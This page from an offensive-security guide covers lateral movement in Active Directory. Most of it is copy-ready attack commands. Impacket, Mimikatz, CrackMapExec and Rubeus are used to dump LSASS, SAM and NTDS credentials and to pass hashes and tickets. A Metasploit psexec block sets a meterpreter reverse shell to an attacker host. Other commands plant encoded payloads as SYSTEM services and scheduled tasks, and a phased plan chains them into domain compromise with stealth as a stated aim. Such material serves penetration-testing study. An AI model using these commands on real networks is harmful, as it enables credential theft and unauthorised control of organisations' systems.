This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Lateral Movement

Understanding Lateral Movement in AD

Core Concept

Purpose: Move from one compromised system to another within an Active Directory environment to escalate privileges, access sensitive data, or reach target objectives.

Attack Flow: 

Initial Compromise → Credential Extraction → Authentication to New Systems → Repeat Process

  • Extract credentials from compromised system

  • Use stolen authentication material to access other systems

  • Establish persistence and extract more credentials

  • Continue until objective is achieved

Requirements: Initial system compromise, extracted authentication material, network access to targets Attack Value: Domain-wide access, privilege escalation, persistent access to sensitive systems

Pass-the-Hash (PtH) Attacks

NTLM Hash Overview

Service Purpose: NTLM hashes are used for authentication in Windows environments, especially for local and SMB authentication.

Why Target NTLM Hashes: These hashes can be used directly for authentication without needing to crack the plaintext password, enabling immediate lateral movement.

Pass-the-Hash Attack

Purpose: Use extracted NTLM hashes to authenticate to other systems without knowing the plaintext password.

Requirements: NTLM hash of user account, target systems accepting NTLM authentication

Attack Value: Immediate access to systems, works even with strong passwords, bypasses password complexity

NTLM Hash Extraction

Using Impacket Tools

# Extract NTLM hashes from compromised system
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Extract from specific registry hives
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -sam -security -system

# Extract cached credentials
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -cached

Using Mimikatz (Windows)

# Extract from LSASS memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords"

# Extract from SAM database
mimikatz "privilege::debug" "lsadump::sam"

# Extract cached credentials
mimikatz "privilege::debug" "lsadump::cache"

Using CrackMapExec

# Extract SAM hashes from multiple systems
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Extract from domain controller
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds

Pass-the-Hash Execution

Using Impacket Tools

# SMB authentication with hash
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Access file shares
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

Using CrackMapExec

# Pass-the-hash across network range
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash>

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa

Using Metasploit

# SMB login with hash
use auxiliary/scanner/smb/smb_login
set RHOSTS <target-IP>
set SMBUser <username>
set SMBPass <NTLM-hash>
run

# PSExec with hash
use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBUser <username>
set SMBPass <NTLM-hash>
run

Pass-the-Ticket (PtT) Attacks

Kerberos Ticket Overview

Service Purpose: Kerberos tickets (TGT/TGS) are used for authentication in Active Directory environments, providing single sign-on capabilities.

Why Target Kerberos Tickets: Valid tickets can be extracted and reused on other systems to impersonate users without needing passwords or hashes.

Pass-the-Ticket Attack

Purpose: Extract and reuse Kerberos tickets to authenticate as other users on different systems.

Requirements: Valid Kerberos tickets (TGT or TGS), target systems in same domain

Attack Value: User impersonation, session hijacking, privilege escalation

Kerberos Ticket Extraction

Using Mimikatz (Windows)

# List current tickets
mimikatz "kerberos::list"

# Export all tickets
mimikatz "kerberos::list /export"

# Extract tickets from LSASS
mimikatz "privilege::debug" "sekurlsa::tickets /export"

# Target specific user's tickets
mimikatz "kerberos::list /user:<username> /export"

Using Impacket Tools

# Extract tickets using getTGT.py (if credentials known)
python3 getTGT.py <domain>/<username>:<password>

# Extract tickets from Windows system (requires local access)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

Using Rubeus (Windows)

# Dump current user tickets
Rubeus.exe dump

# Dump all tickets (requires elevation)
Rubeus.exe dump /luid:0x3e4 /nowrap

# Monitor for new tickets
Rubeus.exe monitor /interval:5

Pass-the-Ticket Execution

Using Impacket Tools

# Set ticket in environment
export KRB5CCNAME=<ticket.ccache>

# Use ticket for authentication (no password needed)
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
python3 smbclient.py <domain>/<username>@<target-server> -k -no-pass
python3 wmiexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Inject ticket into current session
mimikatz "kerberos::ptt <ticket.kirbi>"

# Use injected ticket
dir \\<target-server>\c$
psexec \\<target-server> cmd

Cross-Platform Ticket Conversion

# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>

Over-Pass-the-Hash (Pass-the-Key)

Hybrid Authentication Overview

Service Purpose: Over-pass-the-hash leverages NTLM hashes to request Kerberos tickets, combining the benefits of both authentication methods.

Why Use Over-Pass-the-Hash: Enables Kerberos authentication using only NTLM hashes, providing better stealth and compatibility than pure NTLM authentication.

Over-Pass-the-Hash Attack

Purpose: Use NTLM hashes or AES keys to request Kerberos TGTs, then use those tickets for authentication.

Requirements: NTLM hash or AES key, access to domain controller for TGT request

Attack Value: Stealth (uses Kerberos), bypasses NTLM restrictions, enables advanced Kerberos attacks

Over-Pass-the-Hash Execution

Using Impacket Tools

# Request TGT using NTLM hash
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash>

# Request TGT using AES key
python3 getTGT.py <domain>/<username> -aesKey <AES-key>

# Use obtained TGT
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Over-pass-the-hash with NTLM
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd"

# Over-pass-the-hash with AES256
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd"

# Request TGT in new session
# In the new cmd window:
klist  # Shows TGT after first Kerberos authentication attempt

Using Rubeus (Windows)

# Request TGT using NTLM hash
Rubeus.exe asktgt /user:<username> /domain:<domain> /rc4:<NTLM-hash>

# Request TGT using AES key
Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<AES-key>

# Use ticket
Rubeus.exe ptt /ticket:<base64-ticket>

Remote Execution Techniques

Windows Remote Execution Services

Service Purpose: Various Windows services enable remote command execution for administrative purposes, which can be abused for lateral movement.

Remote Execution Methods

PSExec-style Execution

Using Impacket PSExec

# SMB-based remote execution
python3 psexec.py <domain>/<username>:<password>@<target-IP>
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Kerberos authentication
export KRB5CCNAME=<ticket.ccache>
python3 psexec.py <domain>/<username>@<target-IP> -k -no-pass

Using Metasploit PSExec

use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBUser <username>
set SMBPass <password>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker-IP>
run

WMI-based Execution

Using Impacket WMIExec

# WMI remote execution (more stealthy)
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Semi-interactive shell
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>

Using CrackMapExec WMI

# WMI command execution
crackmapexec wmi <target-IP> -u '<username>' -p '<password>' -x "whoami"
crackmapexec wmi <target-IP> -u '<username>' -H <NTLM-hash> -x "powershell -enc <base64-command>"

DCOM-based Execution

Using Impacket DCOMExec

# DCOM remote execution
python3 dcomexec.py <domain>/<username>:<password>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Specify DCOM object
python3 dcomexec.py <domain>/<username>:<password>@<target-IP> -object MMC20

WinRM-based Execution

Using Evil-WinRM

# Windows Remote Management
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i <target-IP> -u <username> -H <NTLM-hash>

# File upload/download capabilities
upload <local-file> <remote-path>
download <remote-file> <local-path>

Using CrackMapExec WinRM

# WinRM authentication testing
crackmapexec winrm <target-IP> -u '<username>' -p '<password>'
crackmapexec winrm <target-IP> -u '<username>' -H <NTLM-hash>

Service-Specific Remote Execution

RDP-based Access

# Remote Desktop Protocol
rdesktop <target-IP> -u <username> -p <password>
xfreerdp /v:<target-IP> /u:<username> /p:<password>

# RDP with pass-the-hash (requires specific tools)
# Note: Standard RDP doesn't support PtH directly

SSH-based Access (Windows OpenSSH)

# If OpenSSH is installed on Windows target
ssh <username>@<target-IP>
scp <file> <username>@<target-IP>:/path/

Living off the Land (LotL) Techniques

Native Windows Tools for Lateral Movement

Purpose: Use legitimate Windows binaries and features to perform lateral movement without deploying additional tools.

Attack Value: Bypass detection, appear as legitimate admin activity, use trusted binaries.

Built-in Windows Remote Tools

PowerShell Remoting

# Enable PowerShell remoting
Enable-PSRemoting -Force

# Remote PowerShell session
$cred = Get-Credential
Enter-PSSession -ComputerName <target-server> -Credential $cred

# Run commands on remote systems
Invoke-Command -ComputerName <target-server> -Credential $cred -ScriptBlock {Get-Process}

# One-liner remote execution
powershell "Invoke-Command -ComputerName <target> -Credential (Get-Credential) -ScriptBlock {whoami}"

Windows Remote Management (WinRM)

# Test WinRM connectivity
winrs -r:<target-server> -u:<username> -p:<password> ipconfig

# Remote command execution
winrs -r:<target-server> -u:<domain>\<username> -p:<password> "powershell Get-Process"

# Interactive session
winrs -r:<target-server> -u:<username> -p:<password> cmd

WMIC Remote Execution

# Remote process execution via WMI
wmic /node:<target-server> /user:<username> /password:<password> process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Query remote system information
wmic /node:<target-server> /user:<username> /password:<password> computersystem get name,domain,model

# Remote service management
wmic /node:<target-server> /user:<username> /password:<password> service where name="Spooler" call startservice

PsExec (Sysinternals)

# Microsoft Sysinternals PsExec
psexec \\<target-server> -u <domain>\<username> -p <password> cmd

# Execute specific commands
psexec \\<target-server> -u <domain>\<username> -p <password> -c local_script.bat

# Copy and execute
psexec \\<target-server> -u <domain>\<username> -p <password> -c -f payload.exe

Scheduled Tasks for Persistence

# Create remote scheduled task
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc <base64-payload>" /sc onlogon /ru SYSTEM /s <target-server> /u <domain>\<username> /p <password>

# Execute scheduled task
schtasks /run /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password>

# Delete scheduled task
schtasks /delete /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password> /f

Service-based Lateral Movement

# Create remote service
sc \\<target-server> create "UpdateService" binPath= "cmd.exe /c powershell.exe -enc <base64-payload>"

# Start remote service
sc \\<target-server> start "UpdateService"

# Delete remote service
sc \\<target-server> delete "UpdateService"

# Using net commands
net use \\<target-server>\ipc$ /user:<domain>\<username> <password>
copy payload.exe \\<target-server>\c$\temp\
sc \\<target-server> create "TempService" binPath= "C:\temp\payload.exe"
sc \\<target-server> start "TempService"

Registry-based Remote Execution

# Enable RDP remotely via registry
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Modify service registry remotely
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<service>" /v ImagePath /t REG_SZ /d "C:\temp\payload.exe" /f

Advanced Lateral Movement Techniques

Token Impersonation

# Using PowerShell for token impersonation
# List available tokens
Get-Process | Select-Object Name, Id | Where-Object {$_.Name -eq "lsass"}

# Impersonate token (requires elevation)
# This typically requires tools like Incognito or custom PowerShell scripts

Named Pipe Impersonation

# Create named pipe for token capture
# Advanced technique requiring custom implementation

DCOM Lateral Movement

# Abuse DCOM objects for remote execution
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<target-server>"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")

Integrated Lateral Movement Strategy

Progressive Network Compromise

# Phase 1: Initial credential extraction
python3 secretsdump.py <domain>/<username>:<password>@<initial-target>

# Phase 2: Pass-the-hash to nearby systems
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash> --continue-on-success

# Phase 3: Extract additional credentials from new systems
crackmapexec smb <new-targets> -u '<username>' -H <NTLM-hash> --sam --lsa

# Phase 4: Privilege escalation through service accounts
python3 GetUserSPNs.py <domain>/<username> -hashes :<NTLM-hash> -dc-ip <DC-IP> -request

# Phase 5: Kerberos-based lateral movement
export KRB5CCNAME=<service-account>.ccache
python3 wmiexec.py <domain>/<service-account>@<high-value-target> -k -no-pass

Lateral Movement Decision Matrix

Technique
Stealth Level
Network Traffic
Requirements
Detection Risk

Pass-the-Hash

Medium

SMB/445

NTLM hash

Medium

Pass-the-Ticket

High

Kerberos/88

Valid ticket

Low

Over-Pass-the-Hash

High

Kerberos/88

NTLM hash/AES key

Low

WMI Execution

High

WMI/135

Credentials

Low

PSExec

Low

SMB/445

Credentials

High

WinRM

Medium

WinRM/5985

Credentials

Medium

Living off Land

Very High

Various

Credentials

Very Low

Attack Success Indicators

  • Pass-the-Hash: SMB authentication without password knowledge

  • Pass-the-Ticket: Kerberos authentication with stolen tickets

  • Over-Pass-the-Hash: Kerberos tickets obtained via NTLM hashes

  • Remote Execution: Command execution on target systems

  • Living off the Land: Legitimate tools used for malicious purposes

These lateral movement techniques enable rapid domain compromise by leveraging stolen credentials and legitimate Windows functionality to move between systems while maintaining stealth and avoiding detection.

PreviousAuthentication Triggers and Forcing TechniquesNextAdvanced AD Attacks

Last updated

Was this helpful?